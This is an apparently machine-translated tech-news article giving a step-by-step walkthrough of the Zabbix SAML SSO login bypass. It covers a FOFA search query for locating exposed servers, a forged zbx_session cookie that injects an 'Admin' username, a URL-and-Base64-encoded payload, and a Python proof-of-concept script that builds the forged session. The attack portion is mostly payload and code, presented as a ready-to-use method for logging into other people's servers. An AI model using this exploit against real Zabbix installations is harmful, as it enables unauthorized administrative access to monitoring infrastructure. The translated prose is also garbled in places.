Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of "how to operate Zabbix SAML SSO login bypass loopholes". The editor shows you the operation process through an actual case. The operation method is simple and fast, and it is practical. I hope this article "how to operate Zabbix SAML SSO login bypass loopholes" can help you solve the problem.

I. brief introduction

Zabbix is an enterprise-level open source solution based on WEB interface that provides distributed system monitoring and network monitoring capabilities. Zabbix can monitor various network parameters to ensure the safe operation of the server system, and provides a flexible notification mechanism to enable system administrators to quickly locate / solve various problems.

Zabbix server can provide remote server / network status monitoring, data collection and other functions through SNMP,zabbix agent,ping, port monitoring and other methods. It can run on platforms such as Linux,Solaris,HP-UX,AIX,Free BSD,Open BSD,OS X.

The vulnerability is due to the fact that when saml SSO authentication is enabled (not the default), an unauthenticated attacker can modify the session data and successfully bypass the foreground and enter the background because the user login stored in the session is not authenticated.

The limitation of the vulnerability: SAML authentication needs to be enabled and the attacker must know the user name of the Zabbix user.

II. FOFA grammar

App= "ZABBIX- Monitoring system" & & body= "SAML"

III. Recurrence process

1. Search zabbix assets through fofa syntax and access the home page to get the value of zbx_session parameter in set-cookie.

2. Obtain zbx_session parameter Json format data by Url decoding and Base64 decoding.

{"sessionid": "67f71355eb96121f384ea0571290faca", "sign": "Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\ / OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

3. Construct Payload by re-Base64 coding and Url coding after adding saml_data and username_attribute parameters to Json.

{"saml_data": {"username_attribute": "Admin"}, "sessionid": "67f71355eb96121f384ea0571290faca", "sign": "Uyq2BXQfe5Iug4UBpucwq3PXAmVh0ctpR4pvEfzg\ / OWe7TKhmAQdqyu5iUmtWzQR+0m33eQBHnk1VV+IO0icAQ=="}

4. Encode the constructed payload with base64 and url.

% 65%79%4a%7a%59%57%31%73%58%32%52%68%64%47%45%69%4f%6e%73%69%64%58%4e%6c%63%6d%35%68%62%57%56%66%59%58%52%30%63%6d%6c%69%64%58%52%6c%49%6a%6f%69%51%57%52%74%61%57%34%69%66%53%77%69 % 63%32%56%7a%63%32%6c%76%62%6d%6c%6b%49%6a%6f%69%4e%6a%64%6d%4e%7a%45%7a%4e%54%56%6c%59%6a%6b%32%4d%54%49%78%5a%6a%4d%34%4e%47%56%68%4d%44%55%33%4d%54%49%35%4d%47%5a%68%59%32%45%69 % 4c%43%4a%7a%61%57%64%75%49%6a%6f%69%56%58%6c%78%4d%6b%4a%59%55%57%5a%6c%4e%55%6c%31%5a%7a%52%56%51%6e%42%31%59%33%64%78%4d%31%42%59%51%57%31%57%61%44%42%6a%64%48%42%53%4e%48%42%32 % 52%57%5a%36%5a%31%77%76%54%31%64%6c%4e%31%52%4c%61%47%31%42%55%57%52%78%65%58%55%31%61%56%56%74%64%46%64%36%55%56%49%72%4d%47%30%7a%4d%32%56%52%51%6b%68%75%61%7a%46%57%56%69%74%4a % 54%7a%42%70%59%30%46%52%50%54%30%69%66%51%3d%3d

5. Request index_sso.php, construct payload in the http request header, and replace the value of zbx_session with payload encoded by url.

6. Log in to the backend successfully

You can use poc to obtain the constructed payload directly.

Poc:

Import requestsimport reimport urllib.parseimport base64import jsonimport sys def exp (target, username): resp = requests.get (url=target, verify=False) cookie = resp.headers.get ("Set-Cookie") zbx_session= re.findall (r "zbx_session=. *?) ", cookie) url_decode_data = urllib.parse.unquote (zbx_session [0], encoding='utf-8') base64_decode_data = base64.b64decode (url_decode_data) decode_to_str = str (base64_decode_data, encoding='utf-8') to_json = json.loads (decode_to_str) tmp_ojb = dict (saml_data=dict (username_attribute=username), sessionid=to_json [" sessionid "] Sign=to_json ["sign"]) payloadJson = json.dumps (tmp_ojb) print ("decode_payload:", payloadJson) payload = urllib.parse.quote (base64.b64encode (payloadJson.encode ()) print ("zbx_signed_session:" Payload) if _ _ name__ = = "_ main__": if len (sys.argv)! = 3: print ("argv error") exit (0) target = sys.argv [1] username = sys.argv [2] exp (target, username) on "how Zabbix SAML SSO operates login to bypass vulnerabilities" ends here Thank you for your reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.